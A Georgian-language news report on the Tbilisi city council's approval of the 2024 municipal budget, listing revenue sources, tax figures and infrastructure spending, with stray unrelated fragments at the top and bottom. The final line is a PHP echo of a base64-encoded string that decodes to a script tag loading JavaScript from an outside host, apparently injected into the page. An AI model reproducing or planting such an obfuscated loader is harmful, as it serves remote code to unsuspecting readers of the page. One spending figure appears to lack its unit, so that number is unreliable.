celsiusi
ავერსი საქკაბელი

თბილისის საკრებულომ დედაქალაქის 2024 წლის ბიუჯეტი დაამტკიცა.

ბიუჯეტის მთლიანი მოცულობა 1 763 354 000 ლარს შეადგენს, რაც 2023 წლის ბიუჯეტთან შედარებით 131 მლნ ლარით მეტია. აქედან მუნიციპალიტეტის საკუთარი შემოსავლები შეადგენს 1 254 000 000 ლარს, ხოლო 500 000 000 ლარია სახელმწიფო ბიუჯეტიდან მისაღები სპეციალური ტრანსფერი.

გარდა ამისა, 2024 წელს დონორების დაფინანსება შეადგენს 63 მლნ ლარს. ბიუჯეტის საშემოსავლო ნაწილში გადასახადები შეადგენს 918 მლნ ლარს. მათ შორის, ქონების გადასახადი არის 275 მლნ ლარი, სადაც საწარმოთა ქონების გადასახადზე დაგეგმილია 225 მლნ ლარი, ფიზიკური პირის ქონების გადასახადზე – 30 მლნ, ხოლო მიწის გადასახადზე – 20 მლნ ლარი.

დამატებული ღირებულების გადასახადი დაგეგმილია 643 მლნ ლარის ოდენობით. სხვა შემოსავლებში მუნიციპალიტეტს დაგეგმილი აქვს 280 მლნ ლარი. მათ შორის, შემოსავალი საკუთრებიდან – 9 მლნ ლარი, პროცენტები – 3 მლნ ლარი, იჯარა – 6 მლნ ლარი, საქონლის და მომსახურების რეალიზაცია – 165 მლნ ლარი; ადგილობრივი სანებართვო მოსაკრებლებიდან – 18 მლნ ლარი; სათამაშო ბიზნესის მოსაკრებელში დაგეგმილია 70 მლნ ლარი, დასუფთავების შემოსავალი – 75 მლნ ლარი, ხოლო პრივატიზაცია დაგეგმილია 55 მლნ ლარის ოდენობით.

ინფრასტრუქტურის მიმართულებით გასაწევი ხარჯების ოდენობა წარმოადგენს 547 მლნ ლარს, რაც 2023 წელს ამ მიმართულებით გაწეულ ხარჯთან შედარებით 31 მლნ ლარით მეტია. რაც შეეხება სოციალური და ჯანდაცვის მიმართულებას, იგეგმება 507 ლარის ღირებულების პროექტებისა და პროგრამების განხორციელება.

218
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");